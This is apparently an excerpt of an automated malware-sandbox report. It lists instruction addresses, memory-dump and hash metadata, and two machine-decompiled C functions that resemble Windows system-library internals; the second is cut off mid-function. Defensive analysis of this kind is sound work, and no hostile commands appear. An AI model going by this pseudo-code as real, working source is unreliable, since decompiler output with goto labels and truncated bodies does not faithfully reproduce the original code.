                                          0x0041d12f
                                          0x0041d135
                                          0x0041d13b
                                          0x0041d14e
                                          0x0041d14f
                                          0x0041d14f
                                          0x0041d160
                                          0x0041d169
                                          0x0041d16f
                                          0x0041d16f
                                          0x0041d16f
                                          0x0041d180
                                          0x0041d186
                                          0x0041d189
                                          0x0041d18a
                                          0x00000000
                                          0x0041d190
                                          0x0041d190
                                          0x0041d196
                                          0x0041d19c
                                          0x0041d19d
                                          0x0041d1a3
                                          0x0041d1af
                                          0x0041d1b2
                                          0x0041d1b8
                                          0x0041d1b9
                                          0x0041d1bf
                                          0x0041d1c6
                                          0x0041d1c7
                                          0x0041d1ca
                                          0x0041d1d0
                                          0x0041d1d6
                                          0x00000000
                                          0x0041d1dc
                                          0x0041d1e6
                                          0x0041d1e8
                                          0x0041d1ef
                                          0x0041d1ef
                                          0x0041d1d6
                                          0x0041d18a
                                          0x0041cf96
                                          0x0041d07e
                                          0x0041d07e
                                          0x0041d088
                                          0x0041d094
                                          0x0041d0a1
                                          0x0041d0a2
                                          0x0041cf96
                                          0x0041cf96
                                          0x0041cf9d
                                          0x0041cfa3
                                          0x0041cfa9
                                          0x0041cfa9

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5523255cdd580bb0a5f5e35c34744084a090d35f9319e8176c6dd5cb00ec1bbd
                                          • Instruction ID: 1ebdc91fe95a9b71ba86432362b431eb1066fdff0cdde258e763c5c4f1f607e5
                                          • Opcode Fuzzy Hash: 5523255cdd580bb0a5f5e35c34744084a090d35f9319e8176c6dd5cb00ec1bbd
                                          • Instruction Fuzzy Hash: 28226232948380CFDB16DF38D99AB613FB2F756324B08424ED9A1571D6C7382196CF89
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033D20A0, Relevance: .4, Instructions: 420COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E033D20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x3498714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E033D2EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E033D2EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E033A58EC(_t240);
									_t221 =  *0x3495cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x3495cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E033E4A2C(0x3496e40, 0x33e4b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E033C7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x3385c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E033DF6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E033DF6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E03427016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L033C2400(_t267 + 0x20);
															}
															L033C2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E033D2397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E033C2280(_t134, 0x3498608);
									__eflags =  *0x3496e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E033BFFB0(_t198, _t241, 0x3498608);
										__eflags = _t253;
										if(_t253 != 0) {
											L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x3496e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x3498608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E033D6B90(_t210,  &_v64);
										_t262 =  *0x3498608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E033DE180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E033E97C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E033E006A(0x3498608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x3498608);
												E033EB180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x3496904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x3496e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E033BFFB0(_t198, _t240, 0x3498608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E033E00C2(0x3498608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                          0x033d20a0
                                          0x033d20a8
                                          0x033d20ad
                                          0x033d20b3
                                          0x033d20b8
                                          0x033d20c2
                                          0x033d20c7
                                          0x033d20cb
                                          0x033d20d2
                                          0x033d2263
                                          0x033d2266
                                          0x03415836
                                          0x03415836
                                          0x00000000
                                          0x033d226c
                                          0x033d226c
                                          0x033d2270
                                          0x033d2274
                                          0x033d20e2
                                          0x033d20e2
                                          0x033d20e6
                                          0x033d20ee
                                          0x034157dc
                                          0x034157de
                                          0x034157ec
                                          0x034157ec
                                          0x034157f1
                                          0x034157f3
                                          0x034157f8
                                          0x00000000
                                          0x034157f8
                                          0x034157e0
                                          0x034157e4
                                          0x034157ea
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x034157ea
                                          0x033d20f4
                                          0x033d20f4
                                          0x033d20f8
                                          0x033d20f8
                                          0x033d20fc
                                          0x033d2100
                                          0x033d2106
                                          0x033d2201
                                          0x033d2206
                                          0x033d220b
                                          0x033d220e
                                          0x033d22a9
                                          0x033d22ac
                                          0x00000000
                                          0x00000000
                                          0x033d22b2
                                          0x033d22b5
                                          0x03415801
                                          0x03415806
                                          0x00000000
                                          0x00000000
                                          0x03415810
                                          0x03415815
                                          0x03415818
                                          0x00000000
                                          0x00000000
                                          0x0341581e
                                          0x033d22bb
                                          0x033d22bb
                                          0x033d2218
                                          0x033d2218
                                          0x033d221c
                                          0x033d2220
                                          0x033d2222
                                          0x033d22c2
                                          0x033d22c4
                                          0x033d22dc
                                          0x033d22dc
                                          0x033d22e1
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033d22e7
                                          0x033d22c8
                                          0x033d22cd
                                          0x033d22d3
                                          0x033d22d6
                                          0x03415823
                                          0x03415825
                                          0x03415827
                                          0x00000000
                                          0x00000000
                                          0x0341582d
                                          0x00000000
                                          0x0341582d
                                          0x00000000
                                          0x033d2228
                                          0x033d2228
                                          0x00000000
                                          0x033d2228
                                          0x033d2222
                                          0x033d2214
                                          0x033d2214
                                          0x00000000
                                          0x033d2114
                                          0x033d2114
                                          0x033d2114
                                          0x033d211a
                                          0x033d211c
                                          0x033d2348
                                          0x033d234d
                                          0x03415840
                                          0x03415845
                                          0x03415848
                                          0x0341584e
                                          0x0341584e
                                          0x03415848
                                          0x033d2353
                                          0x033d2355
                                          0x033d2388
                                          0x033d2388
                                          0x033d2368
                                          0x033d236a
                                          0x033d236c
                                          0x033d238f
                                          0x00000000
                                          0x033d236e
                                          0x033d236e
                                          0x033d218e
                                          0x033d218e
                                          0x033d2191
                                          0x033d2195
                                          0x03415a03
                                          0x03415a06
                                          0x03415a0c
                                          0x03415a0f
                                          0x03415a11
                                          0x03415a13
                                          0x03415a13
                                          0x03415a19
                                          0x03415a1f
                                          0x00000000
                                          0x033d219b
                                          0x033d219b
                                          0x033d21a0
                                          0x033d2282
                                          0x033d2284
                                          0x033d2284
                                          0x033d2284
                                          0x033d2284
                                          0x033d21a6
                                          0x033d21a9
                                          0x033d21ac
                                          0x033d21ae
                                          0x033d21b3
                                          0x033d228b
                                          0x033d2290
                                          0x033d2379
                                          0x033d2296
                                          0x033d2298
                                          0x033d2298
                                          0x033d2290
                                          0x033d21b9
                                          0x033d21be
                                          0x033d22a2
                                          0x033d22a2
                                          0x033d21c4
                                          0x033d21c8
                                          0x033d21cc
                                          0x033d21d0
                                          0x033d21d4
                                          0x033d21de
                                          0x033d21e3
                                          0x03415a29
                                          0x03415a2c
                                          0x00000000
                                          0x00000000
                                          0x03415a3b
                                          0x00000000
                                          0x033d21e9
                                          0x033d21e9
                                          0x033d21e9
                                          0x033d21ee
                                          0x033d21f1
                                          0x03415a45
                                          0x03415a4b
                                          0x03415a52
                                          0x03415a58
                                          0x03415a5d
                                          0x03415a5f
                                          0x03415a71
                                          0x03415a61
                                          0x03415a6a
                                          0x03415a6a
                                          0x03415a76
                                          0x03415a79
                                          0x03415a7f
                                          0x03415a83
                                          0x03415a85
                                          0x03415a87
                                          0x03415a87
                                          0x03415a8c
                                          0x03415a91
                                          0x03415a97
                                          0x03415a9f
                                          0x03415aa0
                                          0x03415aa1
                                          0x03415aa6
                                          0x03415aab
                                          0x03415ab1
                                          0x03415ab3
                                          0x03415ab9
                                          0x03415aca
                                          0x03415ad4
                                          0x03415ad4
                                          0x03415ade
                                          0x03415ade
                                          0x03415aab
                                          0x03415a79
                                          0x03415a52
                                          0x033d21f7
                                          0x033d21f9
                                          0x033d21fe
                                          0x033d21fe
                                          0x033d21e3
                                          0x033d2195
                                          0x033d236c
                                          0x033d2122
                                          0x033d2122
                                          0x033d2124
                                          0x033d2231
                                          0x033d2236
                                          0x033d2236
                                          0x033d2238
                                          0x033d2238
                                          0x033d2240
                                          0x033d2242
                                          0x033d2244
                                          0x034159fc
                                          0x033d218c
                                          0x033d218c
                                          0x00000000
                                          0x033d218c
                                          0x033d224a
                                          0x033d224f
                                          0x033d2256
                                          0x033d2304
                                          0x033d2309
                                          0x033d230f
                                          0x033d231e
                                          0x033d231e
                                          0x033d231e
                                          0x033d2320
                                          0x033d2325
                                          0x033d232a
                                          0x033d232c
                                          0x033d233e
                                          0x033d233e
                                          0x00000000
                                          0x033d232c
                                          0x033d2311
                                          0x033d2317
                                          0x033d231a
                                          0x033d231c
                                          0x033d2380
                                          0x033d2380
                                          0x033d2380
                                          0x033d2384
                                          0x00000000
                                          0x00000000
                                          0x033d2386
                                          0x00000000
                                          0x033d231c
                                          0x033d225c
                                          0x033d225c
                                          0x00000000
                                          0x033d225c
                                          0x033d212a
                                          0x033d2134
                                          0x033d2138
                                          0x033d213d
                                          0x03415858
                                          0x03415863
                                          0x03415863
                                          0x03415867
                                          0x0341586a
                                          0x00000000
                                          0x00000000
                                          0x0341586c
                                          0x0341586c
                                          0x03415871
                                          0x03415875
                                          0x03415877
                                          0x03415997
                                          0x0341599c
                                          0x034159a1
                                          0x034159a7
                                          0x034159a7
                                          0x00000000
                                          0x034159a7
                                          0x0341587d
                                          0x00000000
                                          0x0341588b
                                          0x0341588b
                                          0x03415890
                                          0x03415892
                                          0x03415894
                                          0x03415899
                                          0x0341589b
                                          0x034158a0
                                          0x034158a0
                                          0x034158aa
                                          0x034158b2
                                          0x034158b6
                                          0x034158be
                                          0x034158c6
                                          0x034158c9
                                          0x0341590d
                                          0x03415917
                                          0x0341591a
                                          0x0341591c
                                          0x03415920
                                          0x03415928
                                          0x0341592a
                                          0x0341592c
                                          0x0341592e
                                          0x0341592e
                                          0x034158cb
                                          0x034158cd
                                          0x034158d8
                                          0x034158e0
                                          0x034158f4
                                          0x034158fe
                                          0x034158fe
                                          0x0341593a
                                          0x0341593e
                                          0x03415940
                                          0x03415942
                                          0x00000000
                                          0x03415944
                                          0x03415944
                                          0x03415949
                                          0x0341594e
                                          0x0341594e
                                          0x03415953
                                          0x0341595b
                                          0x03415976
                                          0x03415976
                                          0x0341597a
                                          0x0341597f
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03415981
                                          0x03415981
                                          0x03415981
                                          0x03415983
                                          0x03415988
                                          0x0341598d
                                          0x03415991
                                          0x03415991
                                          0x00000000
                                          0x0341595d
                                          0x0341595d
                                          0x03415963
                                          0x03415965
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03415967
                                          0x03415967
                                          0x0341596b
                                          0x0341596d
                                          0x00000000
                                          0x00000000
                                          0x0341596f
                                          0x03415971
                                          0x03415971
                                          0x03415974
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03415974
                                          0x00000000
                                          0x03415967
                                          0x0341595b
                                          0x03415942
                                          0x03415863
                                          0x033d2143
                                          0x033d2143
                                          0x033d2149
                                          0x033d214f
                                          0x033d22f1
                                          0x033d22f6
                                          0x00000000
                                          0x033d2173
                                          0x033d2173
                                          0x033d217d
                                          0x033d2181
                                          0x033d2186
                                          0x034159ae
                                          0x034159b2
                                          0x034159b5
                                          0x034159b7
                                          0x034159ba
                                          0x034159cd
                                          0x034159d1
                                          0x034159d5
                                          0x034159d9
                                          0x034159db
                                          0x00000000
                                          0x00000000
                                          0x034159dd
                                          0x034159dd
                                          0x034159e1
                                          0x034159e4
                                          0x034159e7
                                          0x034159ee
                                          0x034159ee
                                          0x034159f3
                                          0x034159f3
                                          0x00000000
                                          0x033d2186
                                          0x033d214f
                                          0x033d2106
                                          0x033d2266
                                          0x033d20d8
                                          0x033d20da
                                          0x033d20e0
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0da3b6c3b16f32af4e90779e225f98bf391bf6feb232dd4ed8efff8892542687
                                          • Instruction ID: 41a9343ae5791b85dbd8414891eddab979e85d6e75265c96bc12cb61159a9d40
                                          • Opcode Fuzzy Hash: 0da3b6c3b16f32af4e90779e225f98bf391bf6feb232dd4ed8efff8892542687
                                          • Instruction Fuzzy Hash: E0F1E432A087459FDB25CF28D88076BB7E9ABC6314F08899EE895DF350D734D841CB96
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033BB090, Relevance: .4, Instructions: 405COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 99%
                                          			E033BB090(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t117;
				signed int _t119;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t126;
				signed int _t134;
				signed int _t139;
				signed char _t143;
				signed int _t144;
				signed int _t146;
				signed int _t148;
				signed int* _t150;
				signed int _t152;
				signed int _t161;
				signed char _t165;
				signed int _t167;
				signed int _t170;
				signed int _t174;
				signed char _t177;
				signed int _t178;
				signed int _t181;
				signed int _t182;
				signed int _t187;
				signed int _t190;
				signed int _t192;
				signed int _t194;
				signed int _t196;
				signed int _t199;
				signed int _t202;
				signed int _t208;
				signed int _t211;

				_t182 = _a16;
				_t178 = _a8;
				_t161 = _a4;
				 *_t182 = 0;
				 *(_t182 + 4) = 0;
				_t5 = _t161 + 4; // 0x4
				_t117 =  *_t5 & 0x00000001;
				if(_t178 == 0) {
					 *_t161 = _t182;
					 *(_t161 + 4) = _t182;
					if(_t117 != 0) {
						_t117 = _t182 | 0x00000001;
						 *(_t161 + 4) = _t117;
					}
					 *(_t182 + 8) = 0;
					goto L43;
				} else {
					_t208 = _t182 ^ _t178;
					_t192 = _t208;
					if(_t117 == 0) {
						_t192 = _t182;
					}
					_t117 = _a12 & 0x000000ff;
					 *(_t178 + _t117 * 4) = _t192;
					if(( *(_t161 + 4) & 0x00000001) == 0) {
						_t208 = _t178;
					}
					 *(_t182 + 8) = _t208 | 0x00000001;
					if(_a12 == 0) {
						_t14 = _t161 + 4; // 0x4
						_t177 =  *_t14;
						_t117 = _t177 & 0xfffffffe;
						if(_t178 == _t117) {
							_t117 = _a4;
							 *(_t117 + 4) = _t182;
							if((_t177 & 0x00000001) != 0) {
								_t161 = _a4;
								_t117 = _t182 | 0x00000001;
								 *(_t161 + 4) = _t117;
							} else {
								_t161 = _t117;
							}
						} else {
							_t161 = _a4;
						}
					}
					if(( *(_t178 + 8) & 0x00000001) == 0) {
						L42:
						L43:
						return _t117;
					} else {
						_t19 = _t161 + 4; // 0x4
						_t165 =  *_t19 & 0x00000001;
						do {
							_t211 =  *(_t178 + 8) & 0xfffffffc;
							if(_t165 != 0) {
								if(_t211 != 0) {
									_t211 = _t211 ^ _t178;
								}
							}
							_t119 =  *_t211;
							if(_t165 != 0) {
								if(_t119 != 0) {
									_t119 = _t119 ^ _t211;
								}
							}
							_t120 = 0;
							_t121 = _t120 & 0xffffff00 | _t119 != _t178;
							_v8 = _t121;
							_t122 = _t121 ^ 0x00000001;
							_v16 = _t122;
							_t123 =  *(_t211 + _t122 * 4);
							if(_t165 != 0) {
								if(_t123 == 0) {
									goto L20;
								}
								_t123 = _t123 ^ _t211;
								goto L13;
							} else {
								L13:
								if(_t123 == 0 || ( *(_t123 + 8) & 0x00000001) == 0) {
									L20:
									_t194 = _v16;
									if((_a12 & 0x000000ff) != _v8) {
										_t126 =  *(_t182 + 8) & 0xfffffffc;
										_t167 = _t165 & 1;
										_v12 = _t167;
										if(_t167 != 0) {
											if(_t126 != 0) {
												_t126 = _t126 ^ _t182;
											}
										}
										if(_t126 != _t178) {
											L83:
											_t178 = 0x1d;
											asm("int 0x29");
											goto L84;
										} else {
											_t126 =  *(_t178 + _t194 * 4);
											if(_t167 != 0) {
												if(_t126 != 0) {
													_t126 = _t126 ^ _t178;
												}
											}
											if(_t126 != _t182) {
												goto L83;
											} else {
												_t126 =  *(_t211 + _v8 * 4);
												if(_t167 != 0) {
													if(_t126 != 0) {
														_t126 = _t126 ^ _t211;
													}
												}
												if(_t126 != _t178) {
													goto L83;
												} else {
													_t77 = _t178 + 8; // 0x8
													_t150 = _t77;
													_v20 = _t150;
													_t126 =  *_t150 & 0xfffffffc;
													if(_t167 != 0) {
														if(_t126 != 0) {
															_t126 = _t126 ^ _t178;
														}
													}
													if(_t126 != _t211) {
														goto L83;
													} else {
														_t202 = _t211 ^ _t182;
														_t152 = _t202;
														if(_t167 == 0) {
															_t152 = _t182;
														}
														 *(_t211 + _v8 * 4) = _t152;
														_t170 = _v12;
														if(_t170 == 0) {
															_t202 = _t211;
														}
														 *(_t182 + 8) =  *(_t182 + 8) & 0x00000003 | _t202;
														_t126 =  *(_t182 + _v8 * 4);
														if(_t170 != 0) {
															if(_t126 == 0) {
																L58:
																if(_t170 != 0) {
																	if(_t126 != 0) {
																		_t126 = _t126 ^ _t178;
																	}
																}
																 *(_t178 + _v16 * 4) = _t126;
																_t199 = _t178 ^ _t182;
																if(_t170 != 0) {
																	_t178 = _t199;
																}
																 *(_t182 + _v8 * 4) = _t178;
																if(_t170 == 0) {
																	_t199 = _t182;
																}
																 *_v20 =  *_v20 & 0x00000003 | _t199;
																_t178 = _t182;
																_t167 =  *((intOrPtr*)(_a4 + 4));
																goto L21;
															}
															_t126 = _t126 ^ _t182;
														}
														if(_t126 != 0) {
															_t167 =  *(_t126 + 8);
															_t194 = _t167 & 0xfffffffc;
															if(_v12 != 0) {
																L84:
																if(_t194 != 0) {
																	_t194 = _t194 ^ _t126;
																}
															}
															if(_t194 != _t182) {
																goto L83;
															}
															if(_v12 != 0) {
																_t196 = _t126 ^ _t178;
															} else {
																_t196 = _t178;
															}
															 *(_t126 + 8) = _t167 & 0x00000003 | _t196;
															_t170 = _v12;
														}
														goto L58;
													}
												}
											}
										}
									}
									L21:
									_t182 = _v8 ^ 0x00000001;
									_t126 =  *(_t178 + 8) & 0xfffffffc;
									_v8 = _t182;
									_t194 = _t167 & 1;
									if(_t194 != 0) {
										if(_t126 != 0) {
											_t126 = _t126 ^ _t178;
										}
									}
									if(_t126 != _t211) {
										goto L83;
									} else {
										_t134 = _t182 ^ 0x00000001;
										_v16 = _t134;
										_t126 =  *(_t211 + _t134 * 4);
										if(_t194 != 0) {
											if(_t126 != 0) {
												_t126 = _t126 ^ _t211;
											}
										}
										if(_t126 != _t178) {
											goto L83;
										} else {
											_t167 = _t211 + 8;
											_t182 =  *_t167 & 0xfffffffc;
											_v20 = _t167;
											if(_t194 != 0) {
												if(_t182 == 0) {
													L80:
													_t126 = _a4;
													if( *_t126 != _t211) {
														goto L83;
													}
													 *_t126 = _t178;
													L34:
													if(_t194 != 0) {
														if(_t182 != 0) {
															_t182 = _t182 ^ _t178;
														}
													}
													 *(_t178 + 8) =  *(_t178 + 8) & 0x00000003 | _t182;
